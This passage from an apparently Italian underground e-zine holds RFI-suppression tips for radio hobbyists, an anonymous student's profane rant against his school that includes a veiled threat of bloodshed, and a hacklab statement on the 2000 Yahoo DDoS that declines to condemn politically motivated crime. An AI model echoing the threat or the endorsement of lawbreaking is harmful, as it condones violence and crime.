antenna a dipolo, che ora riceve la RFI generata dal computer e rumori di altre fonti in misura molto minore grazie al buon accordo di impedenza ed alle migliorate caratteristiche di trasferimento di energia. Un altro beneficio di un buon sistema di antenna rappresentato da una migliore selettivit. Filtri di linea e nuclei RF possono fare miracoli, perci sperimentate con questi aggeggi installandoli in varie posizioni strategiche come alimentatori, alcune linee audio, etc. Oltre che attraverso le linee di alimentazione, la RFI spesso entra attraverso altre linee dati e di controllo nella porte parallele e seriali, cos come nelle porte video. Oltre ad utilizzare le perline in ferrite su queste linee, potreste tentare di collegare dei condensatori di piccolo valore tra le linee e la massa. Per le linee parallele e seriali, utilizzate dei condensatori da 0.01 uF (possibilmente multistrato, MKT, ma anche altri tipi andranno comunque bene), mentre per le porte video collegate dei condensatori da 100 pF dai segnali RGB, H-Sync e V-Sync verso la massa; l'installazione di questi condensatori potrebbe provocare qualche effetto collaterale sulle linee, pertanto consigliabile sperimentare con condensatori di valore leggermente superiore o inferiore. Se vi interessa ricevere solo determinate bande, allora possibile utilizzare un filtro passabanda, passa-alto o passa-basso collegato sull'ingresso d'antenna del ricevitore; si noti ad ogni modo che un tale filtro non in grado di ridurre il rumore presente nella stessa banda. E' anche possibile utilizzare un filtro notch sul cavo d'antenna, per tagliare via determinate emissioni di forte intensit, come ad esempio la frequenza di oscillazione del quarzo a 14.316 MHz della scheda video o il generatore di baud-rate. Si noti che qualunque tipo di filtro (esclusi quelli attivi) produce delle perdite di segnale in grado pi o meno elevato, e se il vostro segnale ricade troppo vicino all'emissione indesiderata, allora non potrete utilizzare un filtro notch perch in caso contrario anche il segnale desiderato verrebbe tagliato via. In questi casi spesso preferibile un filtro notch ad alto Q. Riguardo all'uso di filtri clip-on (come quelli commercializzati dalla RS), ecco cosa ha da dirci Steve Byan: "Il "nucleo clip-on" consiste in un una perlina di ferrite divisa in due, racchiusa in un contenitore di plastica, costruita per la soppressione della RFI generata dai personal computer; le due met della perlina vanno posizionate attorno al cavo da schermare, e poi agganciate tramite un sistema di aggancio. E' possibile ottenere lo stesso effetto inserendo una perlina di ferrite attorno al cavo coassiale prima di collegarvi il connettore all'estremit. Quest'idea simile ai balun in perline di ferrite utilizzati dai radioamatori; l'idea quella di incrementare l'impedenza al flusso di corrente RF sulla parte esterna della calza di schermo del cavo coassiale, in modo da impedire (idealmente) al cavo coassiale di diventare parte integrante dell'antenna. Stento a credere che una o poche di queste perline della Radio Shack montate sul cavo coassiale possano produrre un qualche effetto; penso che ce ne vorrebbero un buon numero per creare una induttanza sufficiente a produrre un qualche effetto. Sarebbe meglio utilizzare le perline sull'apparecchio che genera i disturbi. Personalmente raccommanderei il metodo di John Doty, consistente nel collegare a terra la calza di schermo del cavo coassiale dell'antenna, e nell'installare, dove possibile, il cavo coassiale interrato o molto vicino alla superifcie della terra. Penso che questi accorgimenti aiutino a minimizzare la cattura delle sorgenti locali di rumore in modo pi efficace rispetto all'utilizzo di qualche perlina di ferrite nei pressi del ricevitore." Il disaccoppiamento e il filtraggio della linea di alimentazione essenziale per raggiungere le prestazioni ottimali. L'alimentatore standard montato sulla maggioranza dei PC un alimentatore switching; tali sistemi, sebbene molto efficienti, tendono a generare disturbi impulsivi e armoniche indesiderate a causa dell'effetto switching. Intuile dirlo, se questi disturbi non vengono gestiti in modo appropiato, possono trasferirsi nella rete elettrica e da li nella vostra radio. Di solito non si tratta di un problema serio, in quanto di solito nella progettazione ne viene tenuto conto; ci che preoccupa maggiormente il clock della CPU che si infiltra nella rete elettrica attraverso l'alimentatore. Ancora una volta, un filtro di rete rappresenta la soluzione al problema. Spesso, quando necessario convogliare l'audio del ricevitore nel computer, potreste prendere in considerazione un qualche modo per isolare il segnale piuttosto che collegarlo direttamente al computer. Un semplice sistema consiste nell'utilizzo di un trasformatore audio 1:1; personalmente ho riscontrato un leggero miglioramento, ma non fino al punto da soddisfare le mie aspettative. Ho anche provato a connettere l'audio del ricevitore ad un radiomicrofono FM adattato, per poi ricevere l'audio da inviare al computer con un normale ricevitore FM. Sembra in effetti un sistema macchinoso, ma potrebbe rappresentare un'ultima risorsa, o potrebbe venire in aiuto a chi intende realmente posizionare il computer ad una distanza considerevole dalla radio. E' possibile realizzare altre forme di isolamento utilizzando raggi infrarossi o trasmissioni ottiche; tutti questi sistemi forniranno un eccellente isolamento perlomeno nel caso in cui la linea audio costituisca la principale via di ingresso per la RFI. 8. Problemi di progettazione I problemi di RFI sono a volte aggravati da una cattiva antenna o da un ricevitore di scadente progettazione. Il disadattamento di impedenza dell'antenna, per esempio, pu peggiorare ulteriormente le cose; in tale situazione, pu venire in aiuto l'utilizzo di balun e accordatori d'antenna. Sebbene si supponga che una discesa di antenna in cavo coassiale riesca a tenere la RFI alla larga, in realt un'antenna ed un cavo disadattati possono far catturare la RFI dalla calza di schermo del cavo coassiale. Pertanto, se state utilizzando un cavo coassiale collegato direttamente ad un dipolo bilanciato, provate ad utilizzare un balun nel punto di alimentazione. I balun sono veramente semplici da costruire, ed i progetti per la realizzazione possono essere reperiti anche nell'handbook ARRL; i balun possono anche adattare l'impedenza dell'antenna a quella del cavo di discesa. I balun, essendo quello che sono, normalmente provocano una qualche perdita di segnale ma, in un balun di buona qualit, la perdita insignificante se paragonata alle perdite del cavo stesso; d'altro canto, la perdita di intensit del segnale spesso compensata dal migliorato rapporto segnale/rumore. Non ho avuto conferma di questo, ma la RFI fuori banda pu essere ridotta con l'uso di accordatori d'antenna, che forniscono una migliore selettivit; questi accordatori possono essere facilmente costruiti utilizzando uno dei tanti progetti reperibili nell'ambiente radioamatoriale, perch gli accordatori commerciali tendono ad essere abbastanza costosi e vengono forniti con misuratori di onde stazionarie ed altre simpatiche caratteristiche che non occorrono al radioascoltatore, che deve effettuare semplicemente la ricezione dei segnali radio. Nel mio caso (un cavo coassiale che alimentava fuori centro un dipolo), il balun ha fatto miracoli nel miglioramento del rapporto segnale/rumore ed in realt ho riscontrato un aumento dell'intensit dei segnali; con ci non voglio dire che il balun aumenta il guadagno, ma che la selettivit da esso fornita pu impedire al circuito AGC del ricevitore di ridurre il guadagno per via dei disturbi, producendo come risultato un'apparente aumento dell'intensit del segnale. Ecco cosa ha da dirci Kok Chen AA6TY sui sistemi di antenna non accordati: "Ed infine, proprio come il collegamento di un cavo cossiale ad un'antenna bilanciata rende il cavo coassiale parte integrante del sistema radiante, cos avviene anche il contrario se un tale sistema d'antenna viene usato per la ricezione. Se alimentate una antenna di ricezione bilanciata utilizzando una linea sbilanciata come ad esempio il cavo coassiale, la schermatura del cavo coassiale raccolgier il rumore trasferendolo all'ingresso d'antenna del ricevitore. Per evitare il problema, collegate un balun tra il cavo coassiale e l'antenna stessa." Un guadagno eccessivo, come nel caso di un preamplificatore d'antenna, non sempre migliora il rapporto segnale/rumore perch il rumore viene amplificato insieme al segnale. Sotto questo aspetto, un preamplificatore montato su palo dell'antenna fornisce normalmente prestazioni migliori. In alcuni apparecchi digitali il disaccoppiamento delle tensioni di alimentazione non realizzato a dovere, e quindi la RFI potrebbe non essere soppressa a sufficienza. Per porre rimedio sufficiente montare dei condensatori da 0.1 uF tra la tensione di alimentazione e la massa lungo tutti i punti dell'alimentatore e del circuito. L'operazione potrebbe sembrare stupida, qualcuno potrebbe obiettare che sarebbe sufficiente montare un unico condensatore di maggiore capacit ma sebbene le propriet elettriche in corrente continua siano similari, la capacit distribuita ha un effetto differente sulla RF. Sarebbe consigliabile assicurarsi che tutte le tensioni di alimentazione siano disaccoppiate a dovere, e che sui regolatori di tensione non abbiano luogo oscillazioni indesiderate. Anche la direttivit delle antenne pu aiutare a migliorare la ricezione del segnale in presenza di RFI. L'antenna a loop, per esempio, pu essere posizionata in modo da annullare totalmente la ricezione nella direzione della fonte di RFI. E' una prova che non ho effettuato di persona ma in teoria dovrebbe funzionare, anche se non posso esprimermi sulle reali prestazioni di un tale sistema. Similarmente anche il dipolo presenta determinate propriet di direttivit, dalle quali si pu trarre vantaggio per ridurre la RFI. L'utilizzo di accordatori d'antenna e di preselettori pu aiutare a ridurre il rumore fuori banda e pu quindi fornire un segnale pi chiaro, specialmente se viene utilizzato un accordatore ad altro Q nel front-end della radio. Se viene utilizzata un'antenna con preamplificatore, probabilmente preferibile montare sia l'antenna che il preamplificatore sul palo, in modo che venga amplificato il solo segnale utile e non la RFI generata dal computer. Questo accorgimento particolarmente importante nell'utilizzo di preamplificatori RF a larga banda, che sono maggiormente suscettibili al rumore. Attualmente possiedo un'antenna attiva MFJ modello 1020-A completa di preselettore che nel mio caso funziona bene, riuscendo a rimuovere un ammontare considerevole di segnali fuori banda pur se allo stesso tempo amplifica anche il rumore di fondo. Un utilizzo giudizioso di un tale sistema pu aiutare a migliorare la ricezione di molti segnali, specialmente i segnali a portante continua come le emissioni RTTY, FAX e SSTV. Nel caso intendete autocostruirvi l'interfaccia, provate per quanto possibile a montarla in un contenitore schermante, o un contenitore metallico; questo accorgimento potrebbe aiutare a ridurre l'ingresso della RFI nella radio. 9. Altre misure da adottare Oltre ai suggerimenti gi forniti, se intendete utilizzare il computer per la ricezione di segnali CW/RTTY o altri segnali digitali, un buon filtro IF o audio risulter di grande aiuto nella rimozione del rumore indesiderato. I vantaggi dei diversi tipi di filtri sono descritti in dettaglio nell'Handbook ARRL. Se potete spendere, un filtro DSP rappresenta senza dubbio la scelta migliore, in grado di garantire migliori prestazioni e maggiore versatilit rispetto ai normali filtri a capacit commutata, filtri Notch, ecc. Di nuovo, non posso parlare per esperienza diretta; i filtri passabanda sono abbastanza semplici da costruire, e magari potreste sperimentare con alcuni progetti prima di fare il grande investimento per un apparecchio commerciale. Per coloro che stanno pensando di acquistare un nuovo computer, ho sentito che i notebooks presentano delle emissioni di RFI molto basse e risultano pertanto particolarmente adatti all'utilizzo con le radio. Se, come nel mio caso, non vivete vicino al piano terra, potreste prendere in considerazione l'utilizzo di un sistema d'antenna bilanciato, che non richiede alcuna terra, oppure potreste procurarvi una di quelle 'Terre artificiali' commercializzate dalla MFJ. Ecco una citazione da un messaggio inviatomi da Scott N3FI al riguardo: "Ho acquistato dalla MFJ quest'oggetto denominato 'Terra Artificiale', che consiste in un circuito LC ed un cavo controbilanciato, penso collegati in parallelo. Questo circuito permette di "sintonizzare" la reattanza al di fuori del cavo controbilanciato in modo tale che "sembri" come una vera terra nei confronti dello shack. Non pi scosse sul vostro microfono! Non so se questo accessorio sia necessario anche sui ricevitori, ma penso di no. Ricordate solo che la presa di terra presente sulla presa di corrente effettivamente una terra a 50 o 60 Hz, ma NON a frequenze di vari MHz. Il vostro intero impianto elettrico si comporter come un'antenna!" Ricordate di non tenere il cavo di discesa dell'antenna parallelo alle linee elettriche per tutta la sua lunghezza, e cercate di evitare l'utilizzo di lampade fluorescenti se possibile; alcune delle pi vecchie lampade di questo tipo montano nuclei difettosi che tendono a generare del rumore. Le costruzioni pi moderne dovrebbero essere a posto, ma le vecchie tendono a soffrire di questo problema. Visto che siamo in argomento, ricordate che non sempre la RFI viene generata dal vostro computer e/o monitor; specialmente al giorno d'oggi sempre pi gente vive in appartamenti in condiminio o anche abitazioni unifamiliari molto vicine tra loro, e quindi anche il computer di qualche vicino potrebbe costituire una fonte di rumore. Un modo per accertarsene di instaurare un colloquio cordiale con il vostro vicino o utilizzare un qualche tipo di lamina metallica schermante sulle pareti, tenendo presente che nelle costruzioni in calcestruzzo le pareti contengono delle barre di acciaio, e quindi sarebbe inutile schermarle ulteriormente. 10. Conclusione e ringraziamenti La RFI stata un problema imbarazzante e continuer ad esserlo fino a che i produttori di computer non lo prenderanno in considerazione come tale. Sono benvenuti eventuali contributi e altri suggerimrnti, in modo che si possa compiere dei passi in avanti nella nostra lotta contro la RFI. Grazie a LISO che sempre il migliore! sYn^:se serve l'email scrivete a me e ve la faro' recapitare al piu' presto possibile,10x. ===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Riflessione=--====ooO===0===Ooo===oOOo===ooO===0=== ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] > Team H@ < [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ============ Riflettiamo sui nostri diritti =========== (Voce di un alunno) Ragazzi andata come andata ma tra cortei tentata autogestione e vandali che si introducevano di notte nella scuola che rischiavano il culo per noi non cambiato proprio niente siamo sempre nella solita scuola di merda senza niente e con un figlio di puttana che ci comanda ovvero il preside *********** comunque spero che quest'anno vada meglio.Purtroppo dopo 3 mesi incominciata la scuola ma spero che quest'anno sia tutto diverso,vorrei che la scuola fosse come i bagni alla stazione "sempre OKKUPATA". Queste parole vengono dal fatto che noi alunni veniamo presi per il culo da gente che ha il coltello dalla parte del manico a che chi sa chi si credono di essere e noi purtroppo dobbiamo sempre subire escluso il sottoscritto facendo finta di niente.Ma chi che sta nella merda siamo noi alunni siamo noi poveri alunni che lo prendiamo sempre in culo da tutti, mi sa per che sara sempre cosi perch i ragazzi che lottano per i nostri diritti non sono piu quelli di una volta ricordando il grande "Paolo Ma****O".E poi tutti voi vi accontentate di stare nella merda subendo soltanto, ma questa la vita c' chi lotta sempre per i propri diritti e chi lo prende sempre in culo.Io non sono contro il ragazzo raccomandato ma con chi lo raccomanda e neanche con il ragazzo lecchino ma contro chi fondamentalmente il culo se lo fa leccare e la colpa non neanche di chi corrompe ma di chi corrotto quindi non dobbiamo prendercela con i ragazzi che leccano ma a chi piace a essere leccato e capisc' a me.Noi siamo giovani che diamine quindi sono arrivato alla conclusione e cio che nella scuola va avanti chi lecca chi raccomandato e chi si fa un mazzo tanto studiando e rovinandosi la vita.Io non sono uno di questi e mai lo sar ma come stanno i fatti io voglio far quadrar le cose infatti tanti come me lo prendono sempre in culo perch non essendo appoggiati da nessuno si prendono la colpa di tutto,questa la dura vita di chi come me nei confronti della societ mette in risalto i problemi e cerca di combatterli.Comunque concludo dicendo che se devo andare a scuola nella merda preferisco starne fuori ed evitare di aprire il culo a qualcuno perch le mani addosso agli stronzi non le ho mai messe ma in casi estremi potrei anche farlo ma dovranno ripitturare la scuola per evitare di spargere sangue suggerisco occupare, chi vuole capire capisca.Spero che queste poche riga facciano meditare tutti quelli che leggeranno. Anonimo Questo studente si riferisce alla scuola ma come tutti sanno ormai tutti gli ambienti sociali sono pieni di gente che ne approfitta. Credo che in giro ci siano molti ragazzi come questo che vorrebbero cambiare qualcosa nella nostra societ ormai corrotta ma non hanno il coraggio di parlare oppure preferiscono stare zitti perch pensano che nessuno li ascolti.Non abbiate paura se volete far quadrare le cose potete scrivermi (avatar31@libero.it) e i testi che mi arriveranno li valutero' e forse saranno pubblicati. Vorrei fare dei ringraziamenti a Tasso e a DeMa che mi anno fornito questo Discorso e fare un saluto a tutta la 3C. A[v]a[t]A[r] Ricordate Zero posto per L'infame ___________________________________________________________________________________ -----------------comunicato hacklab-fi sugli Hackers Days----------------- Con questo intervento intendiamo aprire una discussione su come mutano per Internet gli scenari economici politici e giudiziari dopo il martellamento mediatico dellimmaginario collettivo che ha fatto seguito agli "Hackers Days" (come sono stati ribattezzati dalla stampa USA gli attacchi che hanno bloccato per qualche ora Yahoo! e altri noti siti del commercio elettronico") e su come affrontare i problemi che questi mutamenti pongono a chi intenda mantenere quegli spazi di comunicazione libera e non omologata al "pensiero unico" che sinora stato possibile aprire dentro Internet. La prima cosa che si impone anche allosservatore superficiale quanto sia stata enorme la sproporzione tra quanto effettivamente successochi bazzica la rete sa bene che il down di qualche ora di un server cosa abbastanza comune, e che la stragrande maggioranza degli utenti da s non si sarebbe nemmeno accorta di quel che era successoil panico generale che si sollevato o che si preteso di sollevare, e le misure che si vorrebbero adesso far credere destinate a "ripristinare la sicurezza di tutti su Internet". Nemmeno le conseguenze finanziarie dellepisodio giustificano il gigantesco spettacolo mediatico e gli strappamenti di capelli di presidenti USA e governi messi in scena per loccasione. Chi ha familiarit con gli andamenti borsistici sa bene che i cali dellindice Dow-Jones e Nasdaq che si sono verificati (seguiti del resto da pronti rialzi grazie alla vertiginosa impennata dei titoli delle aziende che si occupano di sicurezza) sono fisiologici, specie quando ci sono in ballo capitalizzazioni finanziarie gonfiatissime come quelle di cui sono stati oggetto i siti del commercio elettronico. E sa benissimo che in occasioni del genere, se c qualcuno che ci perde c anche qualcun altro che ci guadagna. Ma si ingannerebbe anche chi volesse vedere in questa sproporzione solo la consueta isteria mediatica di giornalisti e mezzibusti televisivi a caccia di notizie strabilianti da vendere. Stavolta, ad aprire il gran ballo la cui solfa finale come sempre "pi sicurezza in rete per difendere il commercio elettronico" (e vedremo cosa significa questo discorso) sono stati gli astri pi luminosi nel firmamento del potere mondiale. Poche ore dopo laccaduto, Janet Reno, ministro della giustizia USA, ha solennemente promesso al mondo la cattura dei "cybercriminali del terzo millennio" (suona bene, nevvero?) Clinton ha esternato le sue stupefatte preoccupazioni. Parlamenti e governi di tutto il mondo si sono accodati ai leader del Nuovo Ordine Mondiale nelle esortazioni a identificare e scongiurare questa nuova minaccia allumanit. A questo proposito, si potrebbe anche osservare che forse forse, agli albori del terzo millennio, ci sarebbero per lumanit dei pericoli un tantinello pi gravi di cui preoccuparsi: le guerre di sterminio, linquinamento ambientale e lo spreco delle risorse, la miseria, lo sfruttamento e la morte per fame e malattia di centinaia di milioni di uomini donne e bambini... Problemi che magari non sono cos cyberaffascinanti, ma da cui lumanitivi compresi quei due miliardi di persone che in vita loro non hanno mai fatto una telefonata magari un tantinello pi afflitta che non dal simpaticone di turno che viola un sito Web per falsificare le parole di Clinton e mettergli in bocca che in rete ci vuole pi pornografia, venendo promosso per qualche giorno al rango di spauracchio mondiale. Ma si sa, noi siamo degli irriducibili renitenti al pensiero unico, e siamo cos pericolosamente estremisti da credere che i sacri principi del business e della logica del profitto non bastino a giustificare la barbarie e gli orrori del "Nuovo Ordine Mondiale"... Comunque, retoriche millenariste a parte, le ipotesi sugli autori di questo "vilissimo attentato" si sono sprecate. Si va dalle esilaranti dichiarazioni di Eric Holder (viceministro della giustizia USA) che ha dato la colpa ai genitori americani, che trascurano di sorvegliare i loro vispi pargoletti quando stanno al computer, alle seriose ipotesi dellFBI sul "nuovo terrorismo elettronico" nato sulla scia del complotto in rete ordito da cospiratori internazionali per fracassare le vetrine di Seattle. Su questultimo punto in particolare si accanita la stampa, insistendo nel confondere (spesso con fraintendimenti tecnici tanto assurdi quanto divertenti, specie se messi in bocca allhacker di turno frettolosamente scovato a scopo di intervista) consolidate e tradizionali pratiche di disobbedienza civile in rete quali il "netstrike" o linvio massiccio di e-mail di protesta con un attacco tipo "distributed denial of service" come quello attuato contro Yahoo! e co. A questo proposito, dobbiamo essere decisi nel denunciare che dietro "fraintendimenti" del genere pu nascondersi il tentativo autoritario di equiparare alcune tecniche di disobbedienza civiletutto sommato legalitariea comportamenti che costituiscono reato penale. Ma dobbiamo anche essere altrettanto decisi nellaffermare che noi non condanniamo n ci dissociamo a priori da chi decide di "commettere reato" per motivi che ci sembrino politicamente ed eticamente condivisibili <>. Sappiamo troppo bene quali abusi, orrori ed ignominie possono essere coperti dal manto della legge dello stato perch il suo rispetto ci sembri lunica o pi importante considerazione da fare in circostanze del genere. Se questo suona sgradito a chi ha tentato affannosamente di ricoprire lhacker col vestito della rispettabilit a tutti i costifingendo di scordare o ignorando quanti hacker con la legge hanno avuto problemi in nome della libera circolazione dei saperi e dellinformazionemolto semplicemente non sappiamo che farci. Ma nemmeno ci interessa giocare agli investigatori da romanzo giallo o rivendicare un movente politico di nostro gusto per unazione che resta invece aperta a tutte le interpretazionivista la totale assenza di ogni dichiarazione o rivendicazionee sulla quale ogni ipotesi legittima. Una volta sottolineato che la scelta dei siti da attaccare non sembra casuale (si trattava dei siti maggiormente rappresentativi del commercio elettronico e che avevano visto maggiormente crescere le proprie quotazioni in borsa) e che chi ha compiuto lattacco ha avuto se non altro la competenza necessaria a non farsi rintracciare, ci interessa innanzitutto prendere in esame quale realt stia prendendo forma dietro le roboanti dichiarazioni sulla necessit di ripristinare "la sicurezza in rete" da cui siamo stati subissati nei giorni successivi. E una prima realt da prendere in considerazione, ignorata da quasi tutti, questa: LE BANCHE USA SAPEVANO IN ANTICIPO DELLATTACCO. Secondo una nota dellAssociated Press del 14 Febbraio, il "Financial Services Information Sharing and Analysis Center" (FSISAC) aveva diramato diversi allarmi urgenti agli esperti di sicurezza di varie banche USA almeno quattro giorni prima degli inizi degli attacchi, indicando anche alcuni indirizzi Internet di macchine compromesse da cui lattacco sarebbe arrivato. Ma la notizia non stata trasmessa dalle banche allFBI o ad altre agenzie di polizia USA. Va sottolineato che il FSISAC, secondo lAssociated Press, un centro informazioni riservato, al punto che la sua stessa locazione fisica e lelenco delle banche che usufruiscono dei suoi serviziche costano sino a 125.000 dollarisono tenuti segreti. Questo centro stato recentemente sviluppato e potenziato dietro diretto ordine presidenziale e in questa occasione si dimostrato molto efficace. Le banche hanno potuto tenere segreta la notizia degli imminenti attacchi grazie a una precisa disposizione voluta dal Dipartimento del Tesoro USA, per cui non sono tenute a condividere con gli organismi di polizia statali e federali eventuali notizie e informazioni su reati ottenute attraverso questo di sorveglianza. I vertici USA hanno ritenuto che qualunque obbligo in questo senso avrebbe disincentivato le banche ed altri soggetti strategici per leconomia statunitense dallattrezzarsi per una efficace vigilanza contro "impiegati disonesti, bug nel software, virus ed hacker". Senza voler commentare se questa notizia possa dare particolare credibilit alle ipotesi di chi ha visto negli attacchi ad Yahoo! etc. una manovra volta a destabilizzare la borsa a fini speculativi, ci pare evidente come essa getti una luce un tantinello diversa sulla stupefazione di Clinton allindomani degli attacchi. In particolare ci porta a domandare quale senso abbia, ai fini della sicurezza reale, investire milioni di dollari in strutture come il NIPC (National Infrastructure Protection Center, un organismo gestito da FBI ed altre agenzie per la sicurezza delle reti USA contro i reati informatici) se poi a queste strutture non vengono trasmesse le informazioni che erano a disposizione dei pi sofisticati centri di sorveglianza USA. Una seconda realt da prendere in considerazione questa: INTERNET A DIFFERENZA DELLE RETI BLINDATE PER LA GESTIONE DELLE INFORMAZIONI STRATEGICHE DI NATURA ECONOMICA POLITICA E MILITARE, ALTAMENTE INSICURA, e gli alfieri della sicurezza in rete attraverso la repressione lo sanno benissimo, come sanno benissimo che le misure proposte non servono in realt a modificare questa situazione. Secondo un rapporto FBI, nellanno trascorso, il 62% (sissignori, il sessantadue per cento) delle societ americane ha subito violazioni degli impianti informatici senza che nessuno gridasse alla minaccia epocale del terzo millennio. Del resto, i programmi usati per lattacco ad Yahoo! e compagni si basano sugli stessi principi che milioni di ragazzini usano in tutto il mondo per fare ai loro coetanei il dispetto di mettergli KO la macchina quando litigano in Internet Relay Chat. Lesistenza di questa possibilit di attacco e dei software utilizzati nota da anni agli esperti di sicurezza, e ponderose note tecniche su come prevenirle sono da anni disponibili su Internet. Questattacco ha quindi svelato a tutti che il re nudo, ma come nella favola tutti quanti in realt lo sapevano benissimo da tempo. Allora, come mai questa fragilit? La risposta semplice: in primo luogo perch fisiologicamente impossibile garantire sicurezza totale a una rete globale di comunicazione aperta chesebbene tuttaltro che anarchica cresciuta in modo scarsamente pianificato e gerarchico, e che risente ancora dellimpostazione originaria di rete militare, che doveva continuare a funzionare anche se gran parte di essa fosse stata distrutta da un attacco nucleare. Ma anche e sopratutto per pure e semplici ragioni di profitto. Una cosa che gli isterici commentatori sugli attacchi si sono ben guardati dal far rilevare che, se i router (le macchine usate per far uscire le reti locali su Internet) fossero stati ben configurati secondo le norme di sicurezza, lattacco sarebbe risultato inefficace. Ma una volta comprato un router e installato, le successive modifiche di configurazione devono essere fatte da un esperto. E chiamare un esperto esterno o far addestrare un dipendente costa troppo caro. Esistono poi in rete numerose macchine fisse che utilizzano tecnologie sofware come il Wingate (per sistemi Microsoft) che risultano penetrabili con estrema facilit e da cui possibile far partire attacchi come quelli contro Yahoo! etc. senza lasciare alcuna traccia. Macchine da cui vengono per ricavati fior di profitti con il minimo di spesa. La logica del commercio elettronico una logica che taglia il pi possibile sui costi fissi di macchine, spazi e personale per puntare tutto sul profitto da pubblicit e sulla capitalizzazione finanziaria gonfiata. La "febbre delloro cibernetico", il miracolo della "nuova economia", mostrano gi i primi buchi e sotto i lustrini spunta la faccia delleconomia basata sulla logica di sempre: profitto attraverso lo sfruttamento pesante del lavoro, e risparmio sulla sicurezza. Cosa succeder quando il nuovo soggetto collettivo, i lavoratori dellindustria rete, scemati gli entusiasmi e linfatuazione giovanile per il monitorintelligentemente sfruttati da chi incentiva i miti dei tredicenni divenuti miliardari grazie a Internet e poi paga un tozzo di pane chi lavora per luiprenderanno coscienza di questa situazione e agiranno di conseguenza? Ma questo un altro discorso, per ora limitiamoci a registrare come anche da questo punto di vista la "sicurezza in rete" richiederebbe interventi ben diversi da quelli che Clinton e compagni si apprestano a farci trangugiare. Linasprimento delle pene detentive contro i reati telematici (misura che tutti i governi stanno prendendo in esame, e che avr per unico effetto concreto laffibbiamento di qualche anno di galera in pi a qualcuno abbastanza ingenuo da farsi pescare con le mani nel sacco e da diventare "monito per tutti") e linvestimento di milioni di dolari in centri di sorveglianza giganteschi quanto inutili, sono misure di PURA FACCIATA. Non servono a migliorare la sicurezza ma a mantenere la fiducia di massa nellInternet "nuova frontiera del profitto", per assicurarsi che i giganteschi flussi finanziari messi in moto da decine di milioni di consumatori e di investitori scarsamente consapevoli di questa realt non vengano meno. Terza realt: POCHI GIORNI PRIMA DEGLI ATTACCHI, E PRECISAMENTE IL 4 FEBBRAIO, LIETF (Internet Engineering Task Force, lorganismo che lavora sugli standard e sui protocolli su cui si basa il funzionamento di Internet) AVEVA SECCAMENTE RIFIUTATO DI PRENDERE IN CONSIDERAZIONE LA PROPOSTA DELLAMMINISTRAZIONE CLINTON DI APPORTARE MODIFICHE AI NUOVI PROTOCOLLI IP CHE FACILITASSERO IL LAVORO DI INTERCETTAZIONE DELLE AGENZIE DI SORVEGLIANZA. Sebbene tale rifiuto in realt ostacoli in modo minimo dal punto di vista tecnico lintercettazione, dal punto di vista politico ha costituito una secca sconfitta, che andata ad aggiungersi a quelle gi collezionate dai governi su questo terreno, e che rimarca ancora una volta come il "popolo della rete" non abbia poi tanta fiducia nella paterna sorveglianza dello Stato. anche legittimo dedurre che evidentemente per il team IETF (e del resto anche per molte aziende) sorveglianza ed intercettazione non servono a garantire una briciola di sicurezza in pi agli utenti Internet. Malgrado questo, nei giorni immediatamente successivi allattacco, abbiamo sentito Clinton riproporre con forza un ennesimo robusto finanziamento delle agenzie di sorveglianza USA (da 15 a 240 milioni di dollari destinati ad FBI ed NSA, a seconda di quanti gliene lasceranno spendere i suoi avversari repubblicani) come illusoria panacea contro questi attacchi. Abbiamo sentito parlare di nuove futuristiche cyberpolizie, mentre sappiamo che quelle esistenti sono gi state in grado di prevedere gli attacchi, e che solo per scelta politica ed economica questi allarmi non sono stati diffusi oltre il circuito bancario. Abbiamo visto lFBI offrire agli ingenui un proprio software per difendersi dagli hacker (ma chi ci difender dallFBI?). Abbiamo visto persino la CIAquesto campione dellinsicurezza di massa e del terrorismo su scala internazionaleergersi a baluardo della sicurezza in rete. Intanto la Gran Bretagna (non a caso uno dei paesi beneficiari delle informazioni raccolte dal sistema dascolto clandestino Echelon) minaccia due anni di galera a chi si rifiuter di rendere accessibili allo Stato le chiavi private del proprio sistema crittografico che impedisce a terzi indesiderati di leggere le proprie e-mail. In Cina gli utilizzatori di software di crittografia vengono schedati. In Russia sono in atto nuovi tentativi di monitorare e limitare gli accessi alla rete. In Germania abbiamo visto prima criminalizzare poi "collaborare con la polizia" (dizione ambigua che in questi casi pu significare molte cose, da un entusiastco sostegno al trovarsi in stato di semiarresto) lautore di un software che consente di effettuare attacchi come quelli contro Yahoo! messo a punto per ragioni di analisi della sicurezza. Ancora una volta si cerca si sostenere il concetto pericolosissimo e nefasto della "security by obscurity", per cui chi svela al grande pubblico le debolezze di un sistema che si vorrebbero tenere nascoste dovrebbe essere considerato automaticamente responsabile degli attacchi portati contro questo sistema. Proprio in questi ultimi giorni, Eric Holder (sempre lui, il geniale viceministro americano) ha informato il Congresso USA che, come contromisura contro altri possibili attacchi di questo tipo, il governo sta apprestandosi ad inasprire ulteriormente le pene contro gli "hacker", a responsabilizzare penalmente i genitori contro le marachelle al PC commesse dai loro frugoletti, a instaurare misure di monitoraggio sugli accessi e i comportamenti su Internet, e dulcis in fondo, naturalmente, a criminalizzare gli anonymous remailer, quei servizi di anonimizzazione della posta elettronica che rappresentano lunico modo a disposizione degli utenti con scarse conoscenze tecniche per garantirsi un anonimato reale su Internet e per non far rintracciare a chiunque sia intenzionato a farlo lelenco dei propri corrispondenti. Questi servizi, normalmente e storicamente disponibili su Internet, dopo il fallimento dei tentativi passati di additarli come un covo di pedofili e terroristi, vengono ora presentati come una minacciosa "risorsa degli hacker", come se chiunque fosse dotato di un p di competenze tecniche non avesse in realt a disposizione sistemi ben pi efficaci per non farsi rintracciare, e come se non fosse assolutamente chiaro che con gli attacchi portati contro Yahoo! etc. non hanno nulla a che vedere. Infine, nel nostro paese, Rodot in persona ha pensato bene di informarci su "Repubblica" che lora di finirla con la "CyberAnrchia", che rifiutare le regole e la paterna sorveglianza dello stato infantilismo, e che un atteggiamento del genere infantile, perch non solo mette a rischio la libert di tutti ma finisce per dare spazio alla "deregulation" che favorisce i poteri forti economicamente. Del resto tutti sanno che la libert pu esistere solo attraverso le regole, e che queste regole non possono essere liberamente autoscelte ma devono essere necessariamente imposte dallo stato per il bene di tutti. Particolarmente per il bene dei poveri e degli oppressi, per i quali lo stato rappresenta lunica difesa contro i padroni e gi oppressori, particolarmente se lo stato in questione a guida PDS... A questo rispondiamo: NOSSIGNORI! DEVE ESSERE CHIARO A TUTTI: NON LA SICUREZZA, E TANTOMENO LA DIFESA DEGLI INTERESSI DEGLI UTENTI CONTRO I POTERI FORTI CHE SI VUOLE INSEGUIRE CON 